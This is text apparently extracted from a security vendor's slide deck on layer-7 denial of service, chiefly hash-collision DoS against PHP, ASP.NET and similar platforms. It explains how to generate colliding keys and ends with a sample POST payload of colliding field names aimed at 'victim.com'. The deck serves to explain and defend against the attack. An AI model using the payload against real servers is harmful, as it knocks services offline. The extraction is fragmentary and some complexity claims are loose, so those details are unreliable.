``Hash Collision DoS`` Presentation

advertisement
Layer-7 DoS
Hash Collisions
About Hybrid Security
Provide cyber fraud protection to websites
Prevent business logic attacks on web applications
Heuristic web user behavior analysis
Signature-free 0-day attack detection
Layer-7 DoS
• Slowloris:
• R.U.Dead.Yet:
• Keep-Dead:
Written by RSnake,
exploits slow HTTP headers
Written by Raviv Raz,
exploits slow POST fields
Written by Esrun,
exploits long Keep-Alive
sessions
Hash DoS
• HashDoS – Advisory published by Julian Wäld
& Alexander Klink, Dec. 28, 2011
• Vulnerability in ASP.NET (MS11-100)
• Vulnerability in PHP 4 and 5
• Also vulnerable:
Java, Tomcat, Python, Ruby, Oracle
Hash Tables
Hash Key
login=root
Insert, search, delete node
with O(n) complexity
passwd=123
Hash Collisions
Hash Key
When h(Ez) = h(FY)…
Insert, search, delete node
become O(n²) complexity
EzEz=123
EzFY=123
FYEz=123
DJBX33A Hashing
• Daniel J. Bernsetin, 33 additions
• Used in 32 bit PHP 5, Java Tomcat
• Similar function used in Ruby
Hashing With the Pigeons
• Apparently, a non-injective function
• More commonly known as
the pigeonhole principle
Strings
Hashes
DJBX33X Hashing
• Daniel J. Bernsetin, 33 XORs
• Used in 32/64 bit PHP 4 & ASP.NET
• Similar function used in Python
Linear Collision Generation
h('Ey') = 31¹ · 69 + 31° · 121 = 2260
h('FZ') = 31¹ · 70 + 31° · 90 = 2260
h('Eya') = 31 · (31¹ · 69 + 31° · 121) + 31°·97
= 31 · (31¹ · 70 + 31° · 90) + 31°·97
= h('FZa')
DEMO
Using Binary Permutations
h('EzEz')  (00)
= h('EzFY')  (01)
= h('FYEz')  (10)
= h('FYFY')  (11)
Pre-computing rainbow tables
• Calculate long permutations of colliding char pairs
• Create many same-hash field names for POST
• More advanced Meet-In-The-Middle techniques
improve rainbow table creation exponentially
PHP 5
• DJBX33X
• 1 Gbit speed keeps
~ 10,000 i7 core CPU busy
• POST limited by 8 MB
• POST limited by max_input_time
(default on Ubuntu/BSD = 60 seconds)
<?
php echo $_POST["param"];
?>
•
•
•
•
DJBX33X
Breakable using
Meet-In-The-Middle
30 kbits/sec keeps
1 core-2 CPU busy
With 1 Gbit keeps
~ 30,000 core-2 CPU busy
<%
Response.Write Request.Form['param'];
%>
POST http://victim.com/
Host: victim.com
Connection: keep-alive
Content-Length: 1000000
User-Agent: Mozilla/5.0
Cookie: __utmz=181569312.1294666144.1.1
EzEzEzEzEzEzEzEz=&EzEzEzEzEzEzEzFY=&
EzEzEzEzEzEzEzG8=&EzEzEzEzEzEzEzH%17=&…
PoC already in the wild
Thank You
raviv@hybridsec.com
http://www.hybridsec.com
Download